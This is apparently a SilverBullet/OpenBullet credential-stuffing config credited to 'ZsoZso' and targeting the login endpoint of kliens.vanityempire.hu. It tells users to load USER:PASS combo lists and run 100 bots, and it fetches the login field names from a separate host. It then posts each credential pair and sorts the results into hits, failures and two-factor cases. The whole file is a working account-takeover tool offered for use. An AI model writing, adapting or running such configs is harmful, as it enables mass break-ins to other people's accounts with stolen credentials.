[SETTINGS]
{
  "Name": "VanityEmpire Client API [ZsoZso]",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-05-17T21:59:54.0094456+02:00",
  "AdditionalInfo": "Use USER:PASS combo, otherwise you won't get any hit | Csak USER:PASS combo-val megy!!!",
  "RequiredPlugins": [],
  "Author": "ZsoZso",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "VanityEmpire Client API [ZsoZso]",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "http://blauncher.atwebpages.com/fields" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

FUNCTION Split ":" 1 "<SOURCE>" -> VAR "field1" 

FUNCTION Split ":" 2 "<SOURCE>" -> VAR "field2" 

REQUEST POST "https://kliens.vanityempire.hu/login.php" 
  CONTENT "{\"<field1>\":\"<USER>\",\"<field2>\":\"<PASS>\",\"twofact\":\"\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: kliens.vanityempire.hu" 
  HEADER "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2" 

FUNCTION Constant "Config by ZsoZso" -> CAP "Credit" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "adathiba" 
  KEYCHAIN Success OR 
    KEY "sessionId" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "2FACT" 

